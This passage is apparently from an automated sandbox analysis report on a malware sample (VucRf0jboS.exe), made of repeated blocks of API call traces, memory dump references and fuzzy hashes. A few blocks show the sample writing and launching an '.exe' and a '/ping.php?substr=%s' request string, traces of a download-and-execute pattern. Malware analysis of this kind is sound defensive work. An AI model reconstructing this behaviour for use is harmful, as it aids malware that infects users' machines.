                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F
                                                                                                                                                                                                                                        • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041E468
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                                                                      • Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
                                                                                                                                                                                                                                      • Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0415E673
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0415E696
                                                                                                                                                                                                                                        • Part of subcall function 04157CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04157CDE
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0415E6BC
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415E6CF
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0415E6DE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                                                                      • Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
                                                                                                                                                                                                                                      • Instruction ID: 821b80b5dd1845d05ef1202e071089a07a264c1d44855735f40ed380b8e0f302
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0201B172B01315BB233117B65CC8CBB6A6CDAC2AE0B550169FD28D2120EB61AE0281B9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                      • Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                                      • Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,041525ED,04157307,?,04156FAE,00000001,00000364,?,0414E697,?,?,?,0414ED94,?), ref: 04157009
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415703E
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04157065
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 04157072
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 0415707B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                      • Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                                      • Instruction ID: d23cccaf8880ca3d52b225dee9647f88b8669bde5b8ab1636349b2c0aa1fc44a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2801FE76240600E7A73127F56CC6EEB1299DBC2274F510174FC3A921F0FF21A8014155
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041ED86
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041ED98
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041EDAA
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041EDBC
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041EDCE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
                                                                                                                                                                                                                                      • Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                                      • Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04155537
                                                                                                                                                                                                                                        • Part of subcall function 04156501: HeapFree.KERNEL32(00000000,00000000,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?), ref: 04156517
                                                                                                                                                                                                                                        • Part of subcall function 04156501: GetLastError.KERNEL32(?,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?,?), ref: 04156529
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04155549
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415555C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415556D
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415557E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                                      • Instruction ID: 77bd3cbb6817b6195df488ed19faec6cd6f0ecb905c4338a9c3057a1ea4774f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63F030B0861110DBDA27AF54FCC06453B61EB14624352756EF92852278CF3657918FCA
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 0-2895899722
                                                                                                                                                                                                                                      • Opcode ID: 307271cf07234a17719cc341c6256f3d9491265c04953d18a9bfb7d8f1260d71
                                                                                                                                                                                                                                      • Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 307271cf07234a17719cc341c6256f3d9491265c04953d18a9bfb7d8f1260d71
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\VucRf0jboS.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                      • API String ID: 2506810119-3885269222
                                                                                                                                                                                                                                      • Opcode ID: 7252df08df779396c6a9f828a3f268b946ea2b753614b366170cf5b7b8345a46
                                                                                                                                                                                                                                      • Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7252df08df779396c6a9f828a3f268b946ea2b753614b366170cf5b7b8345a46
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\VucRf0jboS.exe,00000104), ref: 0415356A
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 04153635
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415363F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                      • API String ID: 2506810119-3885269222
                                                                                                                                                                                                                                      • Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                                      • Instruction ID: 502daacd6d0c10918e60f6b659263b11685075d049e6a03b64083fc4a38e6f05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F315371A1025CEFDB25DF999CC49DEBBBCEB84754F1040AAED3497220D770AA41CB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 041667B9
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 041667CD
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 041667D6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                                                                                      • API String ID: 3837156514-4119554291
                                                                                                                                                                                                                                      • Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                                      • Instruction ID: 1a59b1fd7c307611e6b3c4dc5476368fdea9f6615ceaddf3e67f1a76e0a6af7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6017C31E0021CEBDF15DFA9E8859DDBBB8FF48740F008126F801A6260EB709A45CF84
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,04165B74,00000001,?,/ping.php?substr=%s), ref: 041664C4
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,04165B74,00000001,?,/ping.php?substr=%s,?), ref: 041664DC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,04165B74,00000001,?,/ping.php?substr=%s,?), ref: 041664E5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                                                                                      • API String ID: 1065093856-4119554291
                                                                                                                                                                                                                                      • Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                                      • Instruction ID: 794b6e604379e38eba2cec5fb88e0861c7c98170ab27d96d8c40715b0b27959a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48E06572601224BBD7311B999C48FA7BE6CEF856A0F040165FB05D21109661DC0197B4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                      • Opcode ID: c52314c68bb5d2cd0ec3ccb49d1868c21592631552be694c337c0e3ca6bae7eb
                                                                                                                                                                                                                                      • Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c52314c68bb5d2cd0ec3ccb49d1868c21592631552be694c337c0e3ca6bae7eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                      • Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                                      • Instruction ID: 0d9488e9982cef239b53f976d9f67f8c82ed8b8444847346fae95d1cf4c3e667
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48A15672A00786DFEB25EE58C8D07EABFE4EF11350F1841A9DCA59B2A0D334A951C760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: 438df31e4ca0038dfaee660d81f95d1ac1cde2fe31961a88ef6aff440cd1ee1d
                                                                                                                                                                                                                                      • Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 438df31e4ca0038dfaee660d81f95d1ac1cde2fe31961a88ef6aff440cd1ee1d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
                                                                                                                                                                                                                                      • Instruction ID: 6ea3612492e7ddeee5b8421846dc3a2caaa098ace50fda7ac9da37e4be8c9883
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A412A32A10205EAEB257EB88CC4AEE36ACEF41374F1401D5FC39D61A0DB74F56196A6
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,04154002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 0415B5B4
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0415B63D
                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0415B64F
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0415B658
                                                                                                                                                                                                                                        • Part of subcall function 04157CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04157CDE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                                                                      • Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
                                                                                                                                                                                                                                      • Instruction ID: dbb23bd79fd887607d6fd552f18cf02a4fc2e6c49a5578191493f817c170140e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D31B271A1020ADBDF249F64DC85DEE7BA5EB40314F040169EC28D71A0E735ED60CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4
                                                                                                                                                                                                                                        • Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
                                                                                                                                                                                                                                        • Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B
                                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 0040CCD9
                                                                                                                                                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
                                                                                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0040CD12
